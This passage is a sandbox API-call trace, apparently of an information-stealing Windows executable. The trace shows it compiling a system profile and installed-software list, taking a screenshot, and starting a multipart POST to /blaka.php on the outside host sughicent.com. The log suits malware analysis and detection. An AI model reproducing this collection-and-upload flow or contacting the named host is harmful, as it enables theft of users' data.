Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2010 x86 Redistributable - 10.0.40219 10.0.40219\nMicrosoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005", lpString2=" " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2010 x86 Redistributable - 10.0.40219 10.0.40219\nMicrosoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2010 x86 Redistributable - 10.0.40219 10.0.40219\nMicrosoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 " [0235.144] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2010 x86 Redistributable - 10.0.40219 10.0.40219\nMicrosoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 ", lpString2="12.0.21005" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2010 x86 Redistributable - 10.0.40219 10.0.40219\nMicrosoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 12.0.21005") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2010 x86 Redistributable - 10.0.40219 10.0.40219\nMicrosoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 12.0.21005" [0235.144] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2010 x86 Redistributable - 10.0.40219 10.0.40219\nMicrosoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 12.0.21005", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2010 x86 Redistributable - 10.0.40219 10.0.40219\nMicrosoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 12.0.21005\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2010 x86 Redistributable - 10.0.40219 10.0.40219\nMicrosoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 12.0.21005\n" [0235.144] RegCloseKey (hKey=0x384) returned 0x0 [0235.144] RegEnumKeyExA (in: hKey=0x388, dwIndex=0x2c, lpName=0x1983bc, lpcchName=0x197fac, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}", lpcchName=0x197fac, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0235.144] RegCloseKey (hKey=0x388) returned 0x0 [0235.144] lstrlenA (lpString="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2010 x86 Redistributable - 10.0.40219 10.0.40219\nMicrosoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 12.0.21005\n") returned 1785 [0235.144] lstrlenA (lpString="system.txt") returned 10 [0235.144] StrCmpCA (pszStr1=".txt", pszStr2=".Z") returned 26 [0235.144] StrCmpCA (pszStr1=".txt", pszStr2=".zip") returned -6 [0235.144] StrCmpCA (pszStr1=".txt", pszStr2=".zoo") returned -6 [0235.144] StrCmpCA (pszStr1=".txt", pszStr2=".arc") returned 19 [0235.144] StrCmpCA (pszStr1=".txt", pszStr2=".lzh") returned 8 [0235.144] StrCmpCA (pszStr1=".txt", pszStr2=".arj") returned 19 [0235.145] StrCmpCA (pszStr1=".txt", pszStr2=".gz") returned 13 [0235.145] StrCmpCA (pszStr1=".txt", pszStr2=".tgz") returned 17 [0235.145] GetLocalTime (in: lpSystemTime=0x198214 | out: lpSystemTime=0x198214*(wYear=0x7e6, wMonth=0x3, wDayOfWeek=0x3, wDay=0x17, wHour=0x4, wMinute=0x30, wSecond=0x24, wMilliseconds=0x55)) [0235.145] SystemTimeToFileTime (in: lpSystemTime=0x198214, lpFileTime=0x19822c | out: lpFileTime=0x19822c) returned 1 [0235.145] FileTimeToSystemTime (in: lpFileTime=0x198200, lpSystemTime=0x1981e8 | out: lpSystemTime=0x1981e8) returned 1 [0235.148] GetTickCount () returned 0x15db370 [0235.148] GetDesktopWindow () returned 0x10010 [0235.149] GetProcessHeap () returned 0x6b0000 [0235.149] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x6afa8) returned 0x726f08 [0235.182] GetProcessHeap () returned 0x6b0000 [0235.182] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x9) returned 0x6f5cb8 [0235.182] GetProcessHeap () returned 0x6b0000 [0235.182] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x360) returned 0x71b480 [0236.054] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x1987c0 | out: ppstm=0x1987c0*=0x6c61b8) returned 0x0 [0236.061] GetDesktopWindow () returned 0x10010 [0236.061] GetWindowRect (in: hWnd=0x10010, lpRect=0x198794 | out: lpRect=0x198794) returned 1 [0236.062] GetDC (hWnd=0x10010) returned 0xd001053c [0236.063] CreateCompatibleDC (hdc=0xd001053c) returned 0x37010976 [0236.063] CreateCompatibleBitmap (hdc=0xd001053c, cx=1440, cy=900) returned 0x36050978 [0236.098] SelectObject (hdc=0x37010976, h=0x36050978) returned 0x185000f [0236.098] BitBlt (hdc=0x37010976, x=0, y=0, cx=1440, cy=900, hdcSrc=0xd001053c, x1=0, y1=0, rop=0xcc0020) returned 1 [0236.503] GdipCreateBitmapFromHBITMAP (hbm=0x36050978, hpal=0x0, bitmap=0x19878c) returned 0x0 [0236.636] GdipGetImageEncodersSize (numEncoders=0x198760, size=0x19875c) returned 0x0 [0236.639] GetProcessHeap () returned 0x6b0000 [0236.639] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x410) returned 0x71b9b8 [0236.640] GdipGetImageEncoders (in: numEncoders=0x5, size=0x410, encoders=0x71b9b8 | out: encoders=0x71b9b8) returned 0x0 [0236.641] GdipSaveImageToStream (image=0xf331f08, stream=0x6c61b8, clsidEncoder=0x198778*(Data1=0x557cf401, Data2=0x1a04, Data3=0x11d3, Data4=([0]=0x9a, [1]=0x73, [2]=0x0, [3]=0x0, [4]=0xf8, [5]=0x1e, [6]=0xf3, [7]=0x2e)), encoderParams=0x0) returned 0x0 [0237.648] GetHGlobalFromStream (in: pstm=0x6c61b8, phglobal=0x198788 | out: phglobal=0x198788) returned 0x0 [0237.648] GlobalLock (hMem=0xf250004) returned 0xff40048 [0237.648] GlobalSize (hMem=0xf250004) returned 0x1703b [0237.654] lstrlenA (lpString="screenshot.jpg") returned 14 [0237.654] StrCmpCA (pszStr1=".jpg", pszStr2=".Z") returned 16 [0237.654] StrCmpCA (pszStr1=".jpg", pszStr2=".zip") returned -16 [0237.654] StrCmpCA (pszStr1=".jpg", pszStr2=".zoo") returned -16 [0237.654] StrCmpCA (pszStr1=".jpg", pszStr2=".arc") returned 9 [0237.654] StrCmpCA (pszStr1=".jpg", pszStr2=".lzh") returned -2 [0237.654] StrCmpCA (pszStr1=".jpg", pszStr2=".arj") returned 9 [0237.654] StrCmpCA (pszStr1=".jpg", pszStr2=".gz") returned 3 [0237.654] StrCmpCA (pszStr1=".jpg", pszStr2=".tgz") returned -10 [0237.654] GetLocalTime (in: lpSystemTime=0x1981b8 | out: lpSystemTime=0x1981b8*(wYear=0x7e6, wMonth=0x3, wDayOfWeek=0x3, wDay=0x17, wHour=0x4, wMinute=0x30, wSecond=0x26, wMilliseconds=0x253)) [0237.654] SystemTimeToFileTime (in: lpSystemTime=0x1981b8, lpFileTime=0x1981d0 | out: lpFileTime=0x1981d0) returned 1 [0237.654] FileTimeToSystemTime (in: lpFileTime=0x1981a4, lpSystemTime=0x19818c | out: lpSystemTime=0x19818c) returned 1 [0237.656] GetTickCount () returned 0x15dbd34 [0237.656] GetDesktopWindow () returned 0x10010 [0237.726] GetProcessHeap () returned 0x6b0000 [0237.726] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x9) returned 0x6f5e38 [0237.726] GetProcessHeap () returned 0x6b0000 [0237.726] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x360) returned 0xff57098 [0237.726] SelectObject (hdc=0x37010976, h=0x185000f) returned 0x36050978 [0237.739] GdipDisposeImage (image=0xf331f08) returned 0x0 [0237.839] GdiplusShutdown (token=0x15d9f8a) [0237.852] DeleteObject (ho=0x36050978) returned 1 [0237.853] DeleteObject (ho=0x37010976) returned 1 [0237.853] ReleaseDC (hWnd=0x10010, hDC=0xd001053c) returned 1 [0237.892] CloseWindow (hWnd=0x10010) returned 1 [0237.895] GetProcessHeap () returned 0x6b0000 [0237.895] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x800000) returned 0x10044020 [0237.966] InternetOpenA (lpszAgent=0x0, dwAccessType=0x1, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0237.971] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x2, lpBuffer=0x1987bc*, dwBufferLength=0x4) returned 1 [0237.971] StrCmpCA (pszStr1="http://", pszStr2="https://") returned -57 [0237.971] GetSystemTime (in: lpSystemTime=0x196400 | out: lpSystemTime=0x196400*(wYear=0x7e6, wMonth=0x3, wDayOfWeek=0x3, wDay=0x17, wHour=0x3, wMinute=0x30, wSecond=0x26, wMilliseconds=0x390)) [0237.971] lstrcatA (in: lpString1="", lpString2="MY58GDTJM7GVAAAI" | out: lpString1="MY58GDTJM7GVAAAI") returned="MY58GDTJM7GVAAAI" [0237.971] lstrcatA (in: lpString1="", lpString2="\r\n" | out: lpString1="\r\n") returned="\r\n" [0237.971] lstrcatA (in: lpString1="\r\n", lpString2="------" | out: lpString1="\r\n------") returned="\r\n------" [0237.971] lstrcatA (in: lpString1="\r\n------", lpString2="MY58GDTJM7GVAAAI" | out: lpString1="\r\n------MY58GDTJM7GVAAAI") returned="\r\n------MY58GDTJM7GVAAAI" [0237.971] lstrcatA (in: lpString1="\r\n------MY58GDTJM7GVAAAI", lpString2="--" | out: lpString1="\r\n------MY58GDTJM7GVAAAI--") returned="\r\n------MY58GDTJM7GVAAAI--" [0237.971] lstrcatA (in: lpString1="\r\n------MY58GDTJM7GVAAAI--", lpString2="\r\n" | out: lpString1="\r\n------MY58GDTJM7GVAAAI--\r\n") returned="\r\n------MY58GDTJM7GVAAAI--\r\n" [0237.971] lstrcatA (in: lpString1="", lpString2="Content-Type: multipart/form-data; boundary=----" | out: lpString1="Content-Type: multipart/form-data; boundary=----") returned="Content-Type: multipart/form-data; boundary=----" [0237.972] lstrcatA (in: lpString1="Content-Type: multipart/form-data; boundary=----", lpString2="MY58GDTJM7GVAAAI" | out: lpString1="Content-Type: multipart/form-data; boundary=----MY58GDTJM7GVAAAI") returned="Content-Type: multipart/form-data; boundary=----MY58GDTJM7GVAAAI" [0237.972] InternetConnectA (hInternet=0xcc0004, lpszServerName="sughicent.com", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0237.972] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="/blaka.php", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x400100, dwContext=0x0) returned 0xcc000c [0237.973] lstrcatA (in: lpString1="", lpString2="------" | out: lpString1="------") returned="------" [0237.973] lstrcatA (in: lpString1="------", 